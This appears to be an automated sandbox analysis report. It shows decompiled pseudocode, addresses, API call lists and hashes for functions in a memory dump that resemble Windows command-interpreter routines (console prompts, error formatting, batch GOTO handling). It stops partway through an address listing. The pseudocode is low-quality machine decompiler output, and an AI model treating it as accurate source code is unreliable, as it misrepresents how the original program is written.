                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: iswspace$wcschr$iswdigit$_setjmp3
                                  • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                  • API String ID: 1805751789-2755026540
                                  • Opcode ID: d345f7ee9424a0f65d82bb86db28ef69571292511aac658e982481d9a43ed111
                                  • Instruction ID: 2a28f156568d5599388c3227f1b5bd46f94f83ac1c59f491f500be45d65d2ee4
                                  • Opcode Fuzzy Hash: d345f7ee9424a0f65d82bb86db28ef69571292511aac658e982481d9a43ed111
                                  • Instruction Fuzzy Hash: 00E1CF71A00205DACB249F69998977A37A0AF15357F28003EEC75DF2A1E3348E9FC752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00179583, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E00179583(void* __ecx, intOrPtr __edx, char _a4) {
				signed int _v12;
				long _v44;
				char _v45;
				char _v46;
				long _v52;
				long _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t58;
				void* _t69;
				signed int _t74;
				void* _t81;
				signed int _t93;
				void _t94;
				signed int _t98;
				char _t100;
				void* _t101;
				signed int* _t105;
				intOrPtr* _t106;
				void* _t114;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				long _t128;
				void* _t130;
				wchar_t* _t131;
				long _t134;
				signed int _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t104 = __ecx;
				_t51 =  *0x17d0b4; // 0x3dd0c51d
				_v12 = _t51 ^ _t135;
				_t100 = _a4;
				_t128 = 0;
				_v68 = __edx;
				_v72 = __ecx;
				_v56 = 0;
				_v45 = 0;
				_v46 = 0;
				if(__edx != 0x400023d3) {
					L5:
					_push(_t100);
					_t124 = E0015B3FC(_t104);
					_t137 = _t136 + 4;
					if(_t124 == 0) {
						L10:
						_t105 =  &_v44;
						_t120 = 0x10;
						_t130 = L"NY" - _t105;
						while(1) {
							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t93 =  *(_t130 + _t105) & 0x0000ffff;
							if(_t93 == 0) {
								break;
							}
							 *_t105 = _t93;
							_t105 =  &(_t105[0]);
							_t120 = _t120 - 1;
							if(_t120 != 0) {
								continue;
							}
							L16:
							_t105 = _t105 - 2;
							L17:
							_t128 = 0;
							 *_t105 = 0;
							L18:
							_t106 =  &_v44;
							_t121 = _t106 + 2;
							do {
								_t58 =  *_t106;
								_t106 = _t106 + 2;
							} while (_t58 != 0);
							_t108 = _t106 - _t121 >> 1;
							_v80 = (_t106 - _t121 >> 1) - 1;
							LocalFree(_t124);
							_t101 = GetStdHandle(0xfffffff5);
							_v88 = _t101;
							if(GetConsoleMode(_t101,  &_v60) != 0) {
								_t108 = _v60 | 0x00000001;
								_v45 = 1;
								SetConsoleMode(_t101, _v60 | 0x00000001);
							}
							_t125 = GetStdHandle(0xfffffff6);
							_v84 = _t125;
							if(GetConsoleMode(_t125,  &_v64) != 0) {
								_t108 = _v64 | 0x00000007;
								SetConsoleMode(_t125, _v64 | 0x00000007);
								_t134 =  *0x183888;
								if(_t134 != 0) {
									_t108 = _t134;
									 *0x1994b4(L"<noalias>");
									 *_t134();
								}
								_t128 = 0;
							}
							_t126 = _v68;
							while(1) {
								_t100 = 1;
								_v52 = 0;
								_t68 = _v72;
								if(_v72 == 0) {
									_push(0);
									_push(_t126);
									_t69 = E0015C108(_t108);
									_t138 = _t137 + 8;
								} else {
									_t69 = E0015C108(_t108, _t126, 1, _t68);
									_t138 = _t137 + 0xc;
								}
								_t108 = 0;
								if(E00160178(_t69) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								if(_v52 == 0xa) {
									goto L45;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t81 = GetStdHandle(0xfffffff6);
									_t121 =  &_v52;
									_t108 = _t81;
									if(E00173B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
										break;
									}
									if(_t100 != 0) {
										_t128 = towupper(_v52) & 0x0000ffff;
										_t138 = _t138 + 4;
										_v56 = _t128;
									}
									_t108 = 0;
									_t100 = 0;
									if(E00160178(_t82) == 0 || ( *0x193aa0 & 0x00000001) == 0) {
										_push(_v52 & 0x0000ffff);
										E001625D9(L"%c");
										_t138 = _t138 + 8;
									}
									if(_v52 != 0xa) {
										continue;
									} else {
										goto L45;
									}
								}
								_t128 = _v44 & 0x0000ffff;
								_v56 = _t128;
								E001625D9(L"\r\n");
								_t138 = _t138 + 4;
								L45:
								_t131 = wcschr( &_v44, _t128);
								_t137 = _t138 + 8;
								if(_t131 == 0) {
									L28:
									_t128 = _v56;
									continue;
								}
								_t133 = _t131 -  &_v44 >> 1;
								if(_t133 > _v80) {
									goto L28;
								}
								_t127 = _v84;
								if(_v45 != 0) {
									SetConsoleMode(_v88, _v60);
								}
								if(_t100 != 0) {
									SetConsoleMode(_t127, _v64);
									_t127 =  *0x183888;
									if(_t127 != 0) {
										 *0x1994b4(L"CMD.EXE");
										 *_t127();
									}
								}
								_t74 = _t133;
								L53:
								return E00166FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
							}
						}
						if(_t120 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t114 = _t124;
					_t8 = _t114 + 2; // 0x2
					_t122 = _t8;
					do {
						_t94 =  *_t114;
						_t114 = _t114 + 2;
					} while (_t94 != 0);
					if(_t114 - _t122 >> 1 >= 0x10) {
						goto L10;
					}
					E00161040( &_v44, 0x10, _t124);
					__imp___wcsupr( &_v44);
					_t137 = _t137 + 4;
					goto L18;
				}
				_t136 = _t136 - 8;
				_t121 = 0;
				_t127 = E00155DB5(__ecx, 0);
				if(_t127 == 0xffffffff) {
					goto L5;
				}
				_t98 = E00160178(_t97);
				_t104 = _t127;
				_t133 = _t98;
				E0015DB92(_t127);
				if(_t98 == 0) {
					_t128 = 0;
					goto L5;
				}
				_t74 = 2;
				goto L53;
			}















































                                  0x00179583
                                  0x0017958b
                                  0x00179592
                                  0x00179596
                                  0x0017959c
                                  0x0017959e
                                  0x001795a1
                                  0x001795a4
                                  0x001795a7
                                  0x001795ab
                                  0x001795b6
                                  0x001795e9
                                  0x001795e9
                                  0x001795ef
                                  0x001795f1
                                  0x001795f6
                                  0x00179634
                                  0x00179634
                                  0x0017963e
                                  0x00179643
                                  0x00179645
                                  0x00179645
                                  0x0017964d
                                  0x00000000
                                  0x00000000
                                  0x0017964f
                                  0x00179656
                                  0x00000000
                                  0x00000000
                                  0x00179658
                                  0x0017965b
                                  0x0017965e
                                  0x00179661
                                  0x00000000
                                  0x00000000
                                  0x00179669
                                  0x00179669
                                  0x0017966c
                                  0x0017966e
                                  0x00179670
                                  0x00179673
                                  0x00179673
                                  0x00179676
                                  0x00179679
                                  0x00179679
                                  0x0017967c
                                  0x0017967f
                                  0x00179686
                                  0x0017968c
                                  0x0017968f
                                  0x0017969d
                                  0x001796a4
                                  0x001796af
                                  0x001796b4
                                  0x001796b7
                                  0x001796bd
                                  0x001796bd
                                  0x001796cb
                                  0x001796d2
                                  0x001796dd
                                  0x001796e4
                                  0x001796e9
                                  0x001796ef
                                  0x001796f7
                                  0x001796fe
                                  0x00179700
                                  0x00179706
                                  0x00179706
                                  0x00179708
                                  0x00179708
                                  0x0017970f
                                  0x00179717
                                  0x00179719
                                  0x0017971b
                                  0x0017971f
                                  0x00179724
                                  0x00179734
                                  0x00179736
                                  0x00179737
                                  0x0017973c
                                  0x00179726
                                  0x0017972a
                                  0x0017972f
                                  0x0017972f
                                  0x0017973f
                                  0x00179748
                                  0x00179753
                                  0x00179753
                                  0x0017975e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00179764
                                  0x00179764
                                  0x0017976c
                                  0x00179772
                                  0x00179775
                                  0x0017977e
                                  0x00000000
                                  0x00000000
                                  0x00179788
                                  0x00179793
                                  0x00179796
                                  0x00179799
                                  0x00179799
                                  0x0017979c
                                  0x0017979e
                                  0x001797a7
                                  0x001797b6
                                  0x001797bc
                                  0x001797c1
                                  0x001797c1
                                  0x001797c9
                                  0x00000000
                                  0x001797cb
                                  0x00000000
                                  0x001797cb
                                  0x001797c9
                                  0x001797cd
                                  0x001797d6
                                  0x001797d9
                                  0x001797de
                                  0x001797e1
                                  0x001797ec
                                  0x001797ee
                                  0x001797f3
                                  0x00179714
                                  0x00179714
                                  0x00000000
                                  0x00179714
                                  0x001797fe
                                  0x00179803
                                  0x00000000
                                  0x00000000
                                  0x0017980d
                                  0x00179810
                                  0x00179818
                                  0x00179818
                                  0x00179820
                                  0x00179826
                                  0x0017982c
                                  0x00179834
                                  0x0017983d
                                  0x00179843
                                  0x00179843
                                  0x00179834
                                  0x00179845
                                  0x00179847
                                  0x00179857
                                  0x00179857
                                  0x00179717
                                  0x00179667
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00179667
                                  0x001795f8
                                  0x001795fa
                                  0x001795fa
                                  0x00179603
                                  0x00179603
                                  0x00179606
                                  0x00179609
                                  0x00179615
                                  0x00000000
                                  0x00000000
                                  0x00179620
                                  0x00179629
                                  0x0017962f
                                  0x00000000
                                  0x0017962f
                                  0x001795b8
                                  0x001795bb
                                  0x001795c2
                                  0x001795c7
                                  0x00000000
                                  0x00000000
                                  0x001795cb
                                  0x001795d0
                                  0x001795d2
                                  0x001795d4
                                  0x001795db
                                  0x001795e7
                                  0x00000000
                                  0x001795e7
                                  0x001795dd
                                  0x00000000

                                  APIs
                                  • _wcsupr.MSVCRT ref: 00179629
                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 0017968F
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00179697
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001796A7
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001796BD
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001796C5
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001796D5
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001796E9
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0017974C
                                  • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00179753
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 0017976C
                                  • towupper.MSVCRT ref: 0017978D
                                  • wcschr.MSVCRT ref: 001797E6
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00179818
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00179826
                                    • Part of subcall function 00160178: _get_osfhandle.MSVCRT ref: 00160183
                                    • Part of subcall function 00160178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0016D6A1), ref: 0016018D
                                    • Part of subcall function 0015DB92: _close.MSVCRT ref: 0015DBC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                  • String ID: <noalias>$CMD.EXE
                                  • API String ID: 2015057810-1690691951
                                  • Opcode ID: df9e91dfb32eed6820b0488e2c4638f5ededd8fadd910d9ca7fbd477adc28547
                                  • Instruction ID: 846ce50c2b95d71110d0093b7e6b3c8c4b85349d886aef2ccdcdc76fa51eca49
                                  • Opcode Fuzzy Hash: df9e91dfb32eed6820b0488e2c4638f5ededd8fadd910d9ca7fbd477adc28547
                                  • Instruction Fuzzy Hash: 4681D571D002149BCF249FB8DC49AEE77B9AF55710F18421EFC16A7290EB709D89CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00171C79, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166windowthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 23%
                                  			E00171C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_t39 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t39 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E00166FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0x19807c;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0x198081 == 0) {
						L5:
						_v524 = 0x1530d8;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E001724CB();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E001724CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E001724CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E001724CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E001724CB();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E001724CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E001724CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E001724CB();
								} else {
									E001724CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E001724CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0x1994b4(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}




























                                  0x00171c79
                                  0x00171c84
                                  0x00171c8b
                                  0x00171c91
                                  0x00171c93
                                  0x00171c9a
                                  0x00171c9f
                                  0x00171e72
                                  0x00171e83
                                  0x00171cad
                                  0x00171cad
                                  0x00171cae
                                  0x00171cb6
                                  0x00171cbb
                                  0x00171cde
                                  0x00171ce2
                                  0x00171cec
                                  0x00171cee
                                  0x00171d23
                                  0x00171cf0
                                  0x00171cf0
                                  0x00171cf3
                                  0x00171d17
                                  0x00171cf5
                                  0x00171cf5
                                  0x00171cf8
                                  0x00171d0b
                                  0x00171cfa
                                  0x00171cfd
                                  0x00171cff
                                  0x00171cff
                                  0x00171cfd
                                  0x00171cf8
                                  0x00171cf3
                                  0x00171d35
                                  0x00171d51
                                  0x00171d61
                                  0x00171d64
                                  0x00171d67
                                  0x00171d6a
                                  0x00171d83
                                  0x00171d88
                                  0x00171d89
                                  0x00171d8a
                                  0x00171d8f
                                  0x00171d6c
                                  0x00171d6c
                                  0x00171d79
                                  0x00171d7e
                                  0x00171d7e
                                  0x00171d96
                                  0x00171d98
                                  0x00171da4
                                  0x00171da9
                                  0x00171dac
                                  0x00171dac
                                  0x00171db4
                                  0x00171db5
                                  0x00171dbe
                                  0x00171dbf
                                  0x00171dcf
                                  0x00171dd6
                                  0x00171ddc
                                  0x00171dec
                                  0x00171df1
                                  0x00171df2
                                  0x00171df3
                                  0x00171df8
                                  0x00171dff
                                  0x00171e0b
                                  0x00171e10
                                  0x00171e10
                                  0x00171e17
                                  0x00171e23
                                  0x00171e28
                                  0x00171e28
                                  0x00171e2f
                                  0x00171e4c
                                  0x00171e62
                                  0x00171e67
                                  0x00171e68
                                  0x00171e69
                                  0x00171e4e
                                  0x00171e58
                                  0x00171e5d
                                  0x00171e31
                                  0x00171e31
                                  0x00171e3e
                                  0x00171e43
                                  0x00171e2f
                                  0x00000000
                                  0x00171cc5
                                  0x00171cca
                                  0x00171cd0
                                  0x00171cd8
                                  0x00171e71
                                  0x00171e71
                                  0x00000000
                                  0x00171e71
                                  0x00000000
                                  0x00171cd8
                                  0x00171cbb

                                  APIs
                                  • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 00171D51
                                  • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00171DB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CurrentFormatMessageThread
                                  • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                  • API String ID: 2411632146-2849347638
                                  • Opcode ID: 4af8678f7df98343452ba96e5aaf76d7c46b5b50f80ee76a9a6598072f467144
                                  • Instruction ID: fc00f7f4bdc36971f40022575fe6ea5cc12e5531b25699cc164948041b52d212
                                  • Opcode Fuzzy Hash: 4af8678f7df98343452ba96e5aaf76d7c46b5b50f80ee76a9a6598072f467144
                                  • Instruction Fuzzy Hash: 6A512171500700FBDB319BADCC49EA7B6B8EB54301F00855DF86E97561DB719A88CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015E560, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0015E560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v24;
				int _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v48;
				struct HINSTANCE__* _v552;
				struct HINSTANCE__* _v556;
				struct HINSTANCE__* _v560;
				struct HINSTANCE__* _v564;
				struct HINSTANCE__* _v568;
				intOrPtr _v572;
				void* _v576;
				void* _v580;
				void* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t71;
				struct HINSTANCE__* _t72;
				struct HINSTANCE__ _t74;
				int _t77;
				int _t82;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				void* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__** _t111;
				void* _t112;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__ _t124;
				struct HINSTANCE__* _t143;
				void* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t147;
				void* _t148;
				struct HINSTANCE__* _t149;
				signed int _t150;
				signed int _t152;
				void* _t153;

				_t136 = __edx;
				_t152 = (_t150 & 0xfffffff8) - 0x234;
				_t60 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t60 ^ _t152;
				_t111 = __ecx;
				_v556 = __edx;
				_t147 = 0;
				_t143 = 1;
				_v564 = 0;
				_v560 = 1;
				_v552 = 0;
				if( *0x193cc4 != __ecx) {
					L79:
					_t63 = _t147;
					goto L33;
				} else {
					L2:
					while(1) {
						if( *0x17d544 != 0) {
							E0017921A(_t111, _t143);
							_t136 = _v556;
						}
						 *0x17d590 = 0;
						if( *0x193cc9 == 0 || _t143 == 0) {
							L5:
							_t145 = E00160662(_t111);
							if(_t145 == 0xffffffff) {
								goto L74;
							}
							_t67 = E0015EEF0(3, _t145, _t111[4]);
							_t147 = _t67;
							__imp___tell(_t145);
							_t111[2] = _t67;
							_t153 = _t152 + 4;
							_t8 = _t145 - 3; // -3
							_t118 = 0;
							_t136 = _t145;
							if(_t8 > 0x5b) {
								L9:
								__imp___close(_t145);
								_t152 = _t153 + 4;
								if(_t147 == 0) {
									goto L42;
								}
								if(_t147 == 1 ||  *0x18f980 == 0x234a) {
									E001782EB(_t118);
									__eflags =  *0x17d0c8 - 1;
									if( *0x17d0c8 == 1) {
										__eflags =  *0x198530;
										if( *0x198530 == 0) {
											E00176FF0(_t118);
											E0015C108(_t118, 0x2371, 1, 0x183892);
											_t152 = _t152 + 0xc;
										}
									}
									E00179287(_t118);
									__imp__longjmp(0x18b8b8, 1);
									goto L79;
								} else {
									if(_t147 == 0xffffffff) {
										_t63 = _v564;
										goto L33;
									} else {
										_t143 = _v560;
										_t136 = _v552;
										goto L14;
									}
								}
							}
							if(_t145 > 0x1f) {
								_t49 = _t145 - 0x20; // -32
								_t108 = 1 + (_t49 >> 5);
								__eflags = _t108;
								_t118 = _t108;
								do {
									_t136 = _t136 - 0x20;
									_t108 = _t108 - 1;
									__eflags = _t108;
								} while (_t108 != 0);
							}
							asm("btr eax, edx");
							goto L9;
						} else {
							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
								goto L5;
							}
							_t147 = E001600B0(0x50);
							__eflags = _t147;
							if(_t147 == 0) {
								L74:
								_t63 = 1;
								L33:
								_pop(_t144);
								_pop(_t148);
								_pop(_t112);
								__eflags = _v8 ^ _t152;
								return E00166FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
							}
							_t147->i = 0;
							_t71 = E0015DF40(L"GOTO");
							 *(_t147 + 0x38) = _t71;
							__eflags = _t71;
							if(_t71 == 0) {
								goto L74;
							}
							_t72 = E0015DF40( *((intOrPtr*)(_v556 + 0x38)));
							 *(_t147 + 0x3c) = _t72;
							__eflags = _t72;
							if(_t72 == 0) {
								goto L74;
							}
							_t136 = 1;
							_t72->i = 0x20;
							 *(_t147 + 0x40) = 0;
							_v552 = 1;
							L14:
							if(_t143 != 0) {
								__eflags = _t147;
								if(_t147 != 0) {
									_v560 = 0;
								}
							}
							_t124 = _t147->i;
							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
								if(_t136 != 0) {
									_v552 = 0;
									_t74 = _t124;
								} else {
									_t74 = _t124;
									if( *0x17d0c8 == 1) {
										_t74 = _t124;
										__eflags = _t124 - 0x3b;
										if(_t124 != 0x3b) {
											__eflags =  *0x198530;
											_t74 = _t124;
											if( *0x198530 == 0) {
												E00176FF0(_t124);
												_t136 = 0;
												E00172ED0(_t147, 0);
												E001625D9(L"\r\n");
												_t74 = _t147->i;
												_t152 = _t152 + 4;
											}
										}
									}
								}
								if(_t74 == 0x3b) {
									_t147 =  *(_t147 + 0x38);
								}
								_v28 = 0;
								_v24 = 1;
								 *(_t152 + 0x23c) = 0x104;
								memset(_t152 + 0x24, 0, 0x104);
								_t152 = _t152 + 0xc;
								if(_v24 == 0) {
									_t77 = 0x104;
								} else {
									_t77 = 0x7fe7;
								}
								if(E00160C70(_t152 + 0x24, _t77) < 0) {
									E00160DE8(_t78, _t152 + 0x20);
									goto L74;
								} else {
									if(_t147 == 0) {
										_t147 = 0;
										_v564 = 0;
										L29:
										__imp__??_V@YAXPAX@Z(_v28);
										_t152 = _t152 + 4;
										goto L30;
									}
									if( *_t147 != 0 || E0015DFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
										L26:
										_t136 = _t147;
										_v564 = E00160E00(2, _t147);
										E001606C0(2);
										_t82 = GetConsoleOutputCP();
										 *0x183854 = _t82;
										GetCPInfo(_t82, 0x183840);
										_t149 =  *0x17d5f8; // 0x0
										if(_t149 == 0) {
											_t84 =  *0x17d0d0; // 0xffffffff
											__eflags = _t84 - 0xffffffff;
											if(_t84 != 0xffffffff) {
												L68:
												__eflags = _t84;
												if(_t84 != 0) {
													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
													 *0x17d5f8 = _t149;
												}
												L70:
												__eflags = _t149;
												if(_t149 != 0) {
													goto L27;
												}
												SetThreadLocale(0x409);
												L28:
												_t147 = _v568;
												goto L29;
											}
											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
											_t149 =  *0x17d5f8; // 0x0
											 *0x17d0d0 = _t84;
											__eflags = _t84 - 0xffffffff;
											if(_t84 == 0xffffffff) {
												goto L70;
											}
											goto L68;
										}
										L27:
										 *0x1994b4(0);
										_t149->i();
										goto L28;
									} else {
										_t91 = E0015D7D4( *(_t147 + 0x38), 0x2a);
										__eflags = _t91;
										if(_t91 != 0) {
											goto L26;
										}
										_t44 = _t91 + 0x3f; // 0x3f
										_t92 = E0015D7D4( *(_t147 + 0x38), _t44);
										__eflags = _t92;
										if(_t92 != 0) {
											goto L26;
										}
										_t141 = _v28;
										__eflags = _v28;
										if(__eflags == 0) {
											_t141 = _t152 + 0x20;
										}
										_t93 = E001610B0(_t147, _t141, __eflags,  *((intOrPtr*)(_t152 + 0x230)));
										__eflags = _t93 - 2;
										if(_t93 != 2) {
											goto L26;
										} else {
											__eflags =  *(_t147 + 0x34);
											if( *(_t147 + 0x34) == 0) {
												L62:
												_t94 = _v28;
												__eflags = _t94;
												if(__eflags == 0) {
													_t94 = _t152 + 0x20;
												}
												_t136 =  *_t111;
												_push(_t94);
												_push(_t111[1]);
												_t95 = E00161F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
												__eflags = _t95;
												if(_t95 != 0) {
													goto L72;
												} else {
													_t147 = 0;
													_v568 = 1;
													_v572 = 0;
													goto L29;
												}
											} else {
												_t136 = _t147;
												_t96 = E001776C0(_v556, _t147);
												__eflags = _t96;
												if(_t96 != 0) {
													L72:
													__imp__??_V@YAXPAX@Z(_v36);
													_t152 = _t152 + 4;
													_t63 = 1;
													goto L33;
												}
												goto L62;
											}
										}
									}
								}
							} else {
								L42:
								_t147 = _v564;
								L30:
								if( *0x193cc4 != _t111) {
									goto L79;
								}
								_t143 = _v560;
								_t136 = _v556;
								continue;
							}
						}
					}
				}
			}




















































                                  0x0015e560
                                  0x0015e568
                                  0x0015e56e
                                  0x0015e575
                                  0x0015e57f
                                  0x0015e581
                                  0x0015e585
                                  0x0015e589
                                  0x0015e58e
                                  0x0015e592
                                  0x0015e596
                                  0x0015e5a0
                                  0x0016c011
                                  0x0016c011
                                  0x00000000
                                  0x0015e5a6
                                  0x00000000
                                  0x0015e5b0
                                  0x0015e5b7
                                  0x0016be97
                                  0x0016be9c
                                  0x0016be9c
                                  0x0015e5c4
                                  0x0015e5cb
                                  0x0015e5d5
                                  0x0015e5dc
                                  0x0015e5e1
                                  0x00000000
                                  0x00000000
                                  0x0015e5f1
                                  0x0015e5f7
